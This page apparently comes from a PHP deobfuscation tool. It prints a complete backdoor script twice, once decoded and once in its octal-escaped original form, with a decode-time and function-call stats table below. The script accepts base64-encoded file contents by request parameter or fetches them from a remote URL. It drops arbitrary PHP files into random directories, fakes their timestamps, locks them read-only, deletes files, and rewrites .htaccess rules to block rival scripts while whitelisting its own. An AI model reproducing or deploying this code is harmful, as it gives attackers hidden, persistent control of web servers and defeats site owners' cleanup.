Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); function rmw($_24144){$_24359=curl_init(); curl_setopt($_24359..
Decoded Output download
<?php error_reporting(0);
function rmw($_24144){$_24359=curl_init();
curl_setopt($_24359,CURLOPT_URL,$_24144);
qvaldh();
curl_setopt($_24359,CURLOPT_RETURNTRANSFER,1);
curl_setopt($_24359,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($_24359,CURLOPT_TIMEOUT,20);
curl_setopt($_24359,CURLOPT_HEADER,0);
$_64572=curl_exec($_24359);
curl_close($_24359);
return $_64572;
}$_78988=((isset($_SERVER["HTTPS"])&&$_SERVER["HTTPS"]!=="off")?"https://":"http://");
$_93028=$_SERVER["HTTP_HOST"];
$_33281=$_SERVER["SCRIPT_NAME"];
function qvaldh(){$_22928=trim("t1c8bnyr");
$_9388=str_replace("/","_",$_22928);
return $_9388;
}$_41751=$_SERVER["SCRIPT_FILENAME"];
$_67032=str_replace($_33281,'',$_41751);
chmod($_67032,0755);
function pcniqwhu(){$_43794=trim("6njw1");
$_87711=substr($_43794,0,mt_rand(1,9));
return $_87711;
}$_54154="---do-not-change-the-following-content---";
if($_SERVER["QUERY_STRING"]=="d_h"){$_58714=array();
$_14609=0;
$_29498=0;
$_58714[0][]=$_67032;
while(!empty($_58714[$_14609])){foreach($_58714[$_14609] as $_59652){$_59674=glob($_59652."/*",GLOB_ONLYDIR);
if(!empty($_59674)){foreach($_59674 as $_19398){$_58714[$_14609+1][]=$_19398;
chmod($_19398,0755);
$_10798=$_19398."/.htaccess";
if(is_file($_10798)){$_66707=file_get_contents($_10798);
if(preg_match('/'.$_54154.'/',$_66707)==0){chmod($_10798,0777);
file_put_contents($_10798,'');
unlink($_10798);
$_29498++;
}}}}}$_14609++;
}echo $_29498."done";
}elseif($_SERVER["QUERY_STRING"]=="c_c"){echo "jk---ok";
}else{$_94577=$_POST["f_c"];
if(empty($_94577)){$_94577=$_GET["f_c"];
}qvaldh();
if(!empty($_94577)){$_94577=substr($_94577,6);
$_94577=str_replace('-','+',$_94577);
$_94577=str_replace('_','/',$_94577);
$_94577=str_replace('.','=',$_94577);
$_94577=base64_decode($_94577);
if(is_file($_67032.$_94577)){echo "fc---ok";
}else{echo "fc---no";
}exit;
}qvaldh();
$_33520=$_POST["f_d"];
if(empty($_33520)){$_33520=$_GET["f_d"];
}if(!empty($_33520)){$_33520=substr($_33520,6);
$_33520=str_replace('-','+',$_33520);
$_33520=str_replace('_','/',$_33520);
$_33520=str_replace('.','=',$_33520);
$_33520=base64_decode($_33520);
if(is_file($_67032.$_33520)){chmod($_67032.$_33520,0777);
file_put_contents($_67032.$_33520,"z",LOCK_EX);
unlink($_67032.$_33520);
}if(!is_file($_67032.$_33520)||trim(file_get_contents($_67032.$_33520))=="z"){echo "fd---ok";
}else{echo "fd---no";
}exit;
}if((!empty($_GET["tmp_fn"]))&&(!empty($_GET["tmp_ct"]))){file_put_contents($_GET["tmp_fn"],$_GET["tmp_ct"],LOCK_EX);
exit;
}if(empty($_POST["code_content"])||empty($_POST["code_filename"])){if(!empty($_GET["u_p"])){$_42573=substr($_GET["u_p"],6);
$_42573=str_replace('-','+',$_42573);
$_42573=str_replace('_','/',$_42573);
agmbneh();
$_42573=str_replace('.','=',$_42573);
$_42573=base64_decode($_42573);
$_48686=trim(rmw($_42573."_code_content.txt"));
if(empty($_48686)){$_48686=trim(file_get_contents($_42573."_code_content.txt"));
}$_61268=trim(rmw($_42573."_code_filename.txt"));
if(empty($_61268)){$_61268=trim(file_get_contents($_42573."_code_filename.txt"));
}}else{if((!empty($_GET["c_fn"]))&&(!empty($_GET["c_ctv"]))&&(!empty($_GET["c_tmp"]))){$_61268=substr($_GET["c_fn"],6);
$_61268=str_replace('-','+',$_61268);
$_61268=str_replace('_','/',$_61268);
$_61268=str_replace('.','=',$_61268);
$_61268=base64_decode($_61268);
$_48686='';
$_33482=0;
while(is_file($_GET["c_tmp"].$_33482.".txt")){$_48686.=file_get_contents($_GET["c_tmp"].$_33482.".txt");
unlink($_GET["c_tmp"].$_33482.".txt");
$_33482++;
}$_48686=str_replace('-','+',$_48686);
pcniqwhu();
$_48686=str_replace('_','/',$_48686);
$_48686=str_replace('.','=',$_48686);
$_48686=base64_decode($_48686);
agmbneh();
if(strlen($_48686)!=trim($_GET["c_ctv"])){$_48686=null;
}}}}else{$_48686=base64_decode($_POST["code_content"]);
$_61268=base64_decode($_POST["code_filename"]);
}if(empty($_48686)||empty($_61268)){exit;
}if(substr($_61268,0,1)=='/'&&substr($_61268,-1,1)!='/'&&preg_match('/[\\<>\*\?\:\"\|]/',$_61268)==0){$_32247=$_67032.$_61268;
$_89874=$_78988.$_93028.$_61268;
preg_match('/(\/.+)\//',$_32247,$_40768);
$_38020=$_40768[1];
$_75356=explode("/",ltrim(str_replace($_67032,"",$_38020),"/"));
$_24359eck_dir=$_67032;
foreach($_75356 as $_41666){$_24359eck_dir.="/".$_41666;
if(is_dir($_24359eck_dir)){chmod($_24359eck_dir,0755);
}else{mkdir($_24359eck_dir,0755,true);
}}if(is_file($_32247)){chmod($_32247,0777);
unlink($_32247);
}file_put_contents($_32247,$_48686);
if(is_file($_32247)&&md5($_48686)==md5(file_get_contents($_32247))){$_48420=1;
echo $_89874;
}}elseif($_61268=="random"){$_37456=array();
$_58714=array();
$_14609=0;
$_37456[]=$_67032;
$_58714[0][]=$_67032;
agmbneh();
while(!empty($_58714[$_14609])){foreach($_58714[$_14609] as $_59652){$_59674=glob($_59652."/*",GLOB_ONLYDIR);
if(!empty($_59674)){foreach($_59674 as $_19398){$_58714[$_14609+1][]=$_19398;
$_37456[]=$_19398;
chmod($_19398,0755);
}}}$_14609++;
if($_14609>=5){break;
}}$_31122="abcdefghijklmnopqrstuvwxyz0123456789";
$_67921=str_shuffle($_31122);
$_69022=substr($_67921,0,mt_rand(3,10)).".php";
$_48420=0;
for($_14398=1;
$_14398<=11;
$_14398++){$_14398==11?$_38020=$_67032:$_38020=$_37456[array_rand($_37456,1)];
$_32247=$_38020.'/'.$_69022;
$_89874=$_78988.$_93028.str_replace($_67032,'',$_38020).'/'.$_69022;
file_put_contents($_32247,$_48686);
if(is_file($_32247)&&md5($_48686)==md5(file_get_contents($_32247))){$_48420=1;
echo $_89874;
break;
}}if($_48420==0){echo "failed-to-create-file:".$_78988.$_93028;
}}else{exit;
}if(isset($_48420)&&$_48420==1){touch($_32247,mktime(mt_rand(0,23),mt_rand(0,59),mt_rand(0,59),mt_rand(1,12),mt_rand(1,28),mt_rand(2015,2020)));
qvaldh();
chmod($_32247,0444);
if($_38020!=$_67032){$_98581='';
foreach(glob($_38020."/*.php") as $_38206){$_98581.="|".basename($_38206);
}$_98581.="|index.php|lndex.php|1ndex.php|wl.php|wl1.php|wl2.php|clock.php|clock1.php|clock2.php";
qvaldh();
$_98581=ltrim($_98581,"|");
$_82771=$_38020."/.htaccess";
if(is_file($_82771)){chmod($_82771,0777);
unlink($_82771);
}$_57842="#".$_54154;
$_57842.="
"."<FilesMatch '.(PhP|php5|suspected|phtml|py|exe|php)$'>";
agmbneh();
$_57842.="
"."Order allow,deny";
$_57842.="
"."Deny from all";
$_57842.="
"."</FilesMatch>";
$_57842.="
"."<FilesMatch '^(".$_98581.")$'>";
$_57842.="
"."Order allow,deny";
$_57842.="
"."Allow from all";
$_57842.="
"."</FilesMatch>";
file_put_contents($_82771,$_57842);
touch($_82771,mktime(mt_rand(0,23),mt_rand(0,59),mt_rand(0,59),mt_rand(1,12),mt_rand(1,28),mt_rand(2015,2020)));
chmod($_82771,0444);
}}}function agmbneh(){$_81695=trim("lh90py");
$_46520=explode("-",$_81695);
return $_46520;
}?>Did this file decode correctly?
Original Code
<?php error_reporting(0);
function rmw($_24144){$_24359=curl_init();
curl_setopt($_24359,CURLOPT_URL,$_24144);
qvaldh();
curl_setopt($_24359,CURLOPT_RETURNTRANSFER,1);
curl_setopt($_24359,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($_24359,CURLOPT_TIMEOUT,20);
curl_setopt($_24359,CURLOPT_HEADER,0);
$_64572=curl_exec($_24359);
curl_close($_24359);
return $_64572;
}$_78988=((isset($_SERVER["\110\124\124\120\123"])&&$_SERVER["\110\124\124\120\123"]!=="\157\146\146")?"\150\164\164\160\163\72\57\57":"\150\164\164\160\72\57\57");
$_93028=$_SERVER["\110\124\124\120\137\110\117\123\124"];
$_33281=$_SERVER["\123\103\122\111\120\124\137\116\101\115\105"];
function qvaldh(){$_22928=trim("t1c8bnyr");
$_9388=str_replace("/","_",$_22928);
return $_9388;
}$_41751=$_SERVER["\123\103\122\111\120\124\137\106\111\114\105\116\101\115\105"];
$_67032=str_replace($_33281,'',$_41751);
chmod($_67032,0755);
function pcniqwhu(){$_43794=trim("6njw1");
$_87711=substr($_43794,0,mt_rand(1,9));
return $_87711;
}$_54154="\55\55\55\144\157\55\156\157\164\55\143\150\141\156\147\145\55\164\150\145\55\146\157\154\154\157\167\151\156\147\55\143\157\156\164\145\156\164\55\55\55";
if($_SERVER["\121\125\105\122\131\137\123\124\122\111\116\107"]=="\144\137\150"){$_58714=array();
$_14609=0;
$_29498=0;
$_58714[0][]=$_67032;
while(!empty($_58714[$_14609])){foreach($_58714[$_14609] as $_59652){$_59674=glob($_59652."\57\52",GLOB_ONLYDIR);
if(!empty($_59674)){foreach($_59674 as $_19398){$_58714[$_14609+1][]=$_19398;
chmod($_19398,0755);
$_10798=$_19398."\57\56\150\164\141\143\143\145\163\163";
if(is_file($_10798)){$_66707=file_get_contents($_10798);
if(preg_match('/'.$_54154.'/',$_66707)==0){chmod($_10798,0777);
file_put_contents($_10798,'');
unlink($_10798);
$_29498++;
}}}}}$_14609++;
}echo $_29498."\144\157\156\145";
}elseif($_SERVER["\121\125\105\122\131\137\123\124\122\111\116\107"]=="\143\137\143"){echo "\152\153\55\55\55\157\153";
}else{$_94577=$_POST["\146\137\143"];
if(empty($_94577)){$_94577=$_GET["\146\137\143"];
}qvaldh();
if(!empty($_94577)){$_94577=substr($_94577,6);
$_94577=str_replace('-','+',$_94577);
$_94577=str_replace('_','/',$_94577);
$_94577=str_replace('.','=',$_94577);
$_94577=base64_decode($_94577);
if(is_file($_67032.$_94577)){echo "\146\143\55\55\55\157\153";
}else{echo "\146\143\55\55\55\156\157";
}exit;
}qvaldh();
$_33520=$_POST["\146\137\144"];
if(empty($_33520)){$_33520=$_GET["\146\137\144"];
}if(!empty($_33520)){$_33520=substr($_33520,6);
$_33520=str_replace('-','+',$_33520);
$_33520=str_replace('_','/',$_33520);
$_33520=str_replace('.','=',$_33520);
$_33520=base64_decode($_33520);
if(is_file($_67032.$_33520)){chmod($_67032.$_33520,0777);
file_put_contents($_67032.$_33520,"\172",LOCK_EX);
unlink($_67032.$_33520);
}if(!is_file($_67032.$_33520)||trim(file_get_contents($_67032.$_33520))=="\172"){echo "\146\144\55\55\55\157\153";
}else{echo "\146\144\55\55\55\156\157";
}exit;
}if((!empty($_GET["\164\155\160\137\146\156"]))&&(!empty($_GET["\164\155\160\137\143\164"]))){file_put_contents($_GET["\164\155\160\137\146\156"],$_GET["\164\155\160\137\143\164"],LOCK_EX);
exit;
}if(empty($_POST["\143\157\144\145\137\143\157\156\164\145\156\164"])||empty($_POST["\143\157\144\145\137\146\151\154\145\156\141\155\145"])){if(!empty($_GET["\165\137\160"])){$_42573=substr($_GET["\165\137\160"],6);
$_42573=str_replace('-','+',$_42573);
$_42573=str_replace('_','/',$_42573);
agmbneh();
$_42573=str_replace('.','=',$_42573);
$_42573=base64_decode($_42573);
$_48686=trim(rmw($_42573."\137\143\157\144\145\137\143\157\156\164\145\156\164\56\164\170\164"));
if(empty($_48686)){$_48686=trim(file_get_contents($_42573."\137\143\157\144\145\137\143\157\156\164\145\156\164\56\164\170\164"));
}$_61268=trim(rmw($_42573."\137\143\157\144\145\137\146\151\154\145\156\141\155\145\56\164\170\164"));
if(empty($_61268)){$_61268=trim(file_get_contents($_42573."\137\143\157\144\145\137\146\151\154\145\156\141\155\145\56\164\170\164"));
}}else{if((!empty($_GET["\143\137\146\156"]))&&(!empty($_GET["\143\137\143\164\166"]))&&(!empty($_GET["\143\137\164\155\160"]))){$_61268=substr($_GET["\143\137\146\156"],6);
$_61268=str_replace('-','+',$_61268);
$_61268=str_replace('_','/',$_61268);
$_61268=str_replace('.','=',$_61268);
$_61268=base64_decode($_61268);
$_48686='';
$_33482=0;
while(is_file($_GET["\143\137\164\155\160"].$_33482."\56\164\170\164")){$_48686.=file_get_contents($_GET["\143\137\164\155\160"].$_33482."\56\164\170\164");
unlink($_GET["\143\137\164\155\160"].$_33482."\56\164\170\164");
$_33482++;
}$_48686=str_replace('-','+',$_48686);
pcniqwhu();
$_48686=str_replace('_','/',$_48686);
$_48686=str_replace('.','=',$_48686);
$_48686=base64_decode($_48686);
agmbneh();
if(strlen($_48686)!=trim($_GET["\143\137\143\164\166"])){$_48686=null;
}}}}else{$_48686=base64_decode($_POST["\143\157\144\145\137\143\157\156\164\145\156\164"]);
$_61268=base64_decode($_POST["\143\157\144\145\137\146\151\154\145\156\141\155\145"]);
}if(empty($_48686)||empty($_61268)){exit;
}if(substr($_61268,0,1)=='/'&&substr($_61268,-1,1)!='/'&&preg_match('/[\\\<>\*\?\:\"\|]/',$_61268)==0){$_32247=$_67032.$_61268;
$_89874=$_78988.$_93028.$_61268;
preg_match('/(\/.+)\//',$_32247,$_40768);
$_38020=$_40768[1];
$_75356=explode("/",ltrim(str_replace($_67032,"",$_38020),"/"));
$_24359eck_dir=$_67032;
foreach($_75356 as $_41666){$_24359eck_dir.="/".$_41666;
if(is_dir($_24359eck_dir)){chmod($_24359eck_dir,0755);
}else{mkdir($_24359eck_dir,0755,true);
}}if(is_file($_32247)){chmod($_32247,0777);
unlink($_32247);
}file_put_contents($_32247,$_48686);
if(is_file($_32247)&&md5($_48686)==md5(file_get_contents($_32247))){$_48420=1;
echo $_89874;
}}elseif($_61268=="\162\141\156\144\157\155"){$_37456=array();
$_58714=array();
$_14609=0;
$_37456[]=$_67032;
$_58714[0][]=$_67032;
agmbneh();
while(!empty($_58714[$_14609])){foreach($_58714[$_14609] as $_59652){$_59674=glob($_59652."\57\52",GLOB_ONLYDIR);
if(!empty($_59674)){foreach($_59674 as $_19398){$_58714[$_14609+1][]=$_19398;
$_37456[]=$_19398;
chmod($_19398,0755);
}}}$_14609++;
if($_14609>=5){break;
}}$_31122="\141\142\143\144\145\146\147\150\151\152\153\154\155\156\157\160\161\162\163\164\165\166\167\170\171\172\60\61\62\63\64\65\66\67\70\71";
$_67921=str_shuffle($_31122);
$_69022=substr($_67921,0,mt_rand(3,10))."\56\160\150\160";
$_48420=0;
for($_14398=1;
$_14398<=11;
$_14398++){$_14398==11?$_38020=$_67032:$_38020=$_37456[array_rand($_37456,1)];
$_32247=$_38020.'/'.$_69022;
$_89874=$_78988.$_93028.str_replace($_67032,'',$_38020).'/'.$_69022;
file_put_contents($_32247,$_48686);
if(is_file($_32247)&&md5($_48686)==md5(file_get_contents($_32247))){$_48420=1;
echo $_89874;
break;
}}if($_48420==0){echo "\146\141\151\154\145\144\55\164\157\55\143\162\145\141\164\145\55\146\151\154\145\72".$_78988.$_93028;
}}else{exit;
}if(isset($_48420)&&$_48420==1){touch($_32247,mktime(mt_rand(0,23),mt_rand(0,59),mt_rand(0,59),mt_rand(1,12),mt_rand(1,28),mt_rand(2015,2020)));
qvaldh();
chmod($_32247,0444);
if($_38020!=$_67032){$_98581='';
foreach(glob($_38020."\57\52\56\160\150\160") as $_38206){$_98581.="\174".basename($_38206);
}$_98581.="\174\151\156\144\145\170\56\160\150\160\174\154\156\144\145\170\56\160\150\160\174\61\156\144\145\170\56\160\150\160\174\167\154\56\160\150\160\174\167\154\61\56\160\150\160\174\167\154\62\56\160\150\160\174\143\154\157\143\153\56\160\150\160\174\143\154\157\143\153\61\56\160\150\160\174\143\154\157\143\153\62\56\160\150\160";
qvaldh();
$_98581=ltrim($_98581,"\174");
$_82771=$_38020."\57\56\150\164\141\143\143\145\163\163";
if(is_file($_82771)){chmod($_82771,0777);
unlink($_82771);
}$_57842="\43".$_54154;
$_57842.="\n"."\74\106\151\154\145\163\115\141\164\143\150\40\47\56\50\120\150\120\174\160\150\160\65\174\163\165\163\160\145\143\164\145\144\174\160\150\164\155\154\174\160\171\174\145\170\145\174\160\150\160\51\44\47\76";
agmbneh();
$_57842.="\n"."\117\162\144\145\162\40\141\154\154\157\167\54\144\145\156\171";
$_57842.="\n"."\104\145\156\171\40\146\162\157\155\40\141\154\154";
$_57842.="\n"."\74\57\106\151\154\145\163\115\141\164\143\150\76";
$_57842.="\n"."\74\106\151\154\145\163\115\141\164\143\150\40\47\136\50".$_98581."\51\44\47\76";
$_57842.="\n"."\117\162\144\145\162\40\141\154\154\157\167\54\144\145\156\171";
$_57842.="\n"."\101\154\154\157\167\40\146\162\157\155\40\141\154\154";
$_57842.="\n"."\74\57\106\151\154\145\163\115\141\164\143\150\76";
file_put_contents($_82771,$_57842);
touch($_82771,mktime(mt_rand(0,23),mt_rand(0,59),mt_rand(0,59),mt_rand(1,12),mt_rand(1,28),mt_rand(2015,2020)));
chmod($_82771,0444);
}}}function agmbneh(){$_81695=trim("lh90py");
$_46520=explode("-",$_81695);
return $_46520;
}?>Function Calls
| str_replace | 1 |
| error_reporting | 1 |
Stats
| MD5 | da444c5a98d21bc1d5c3d43c6776e7f2 |
| Eval Count | 0 |
| Decode Time | 107 ms |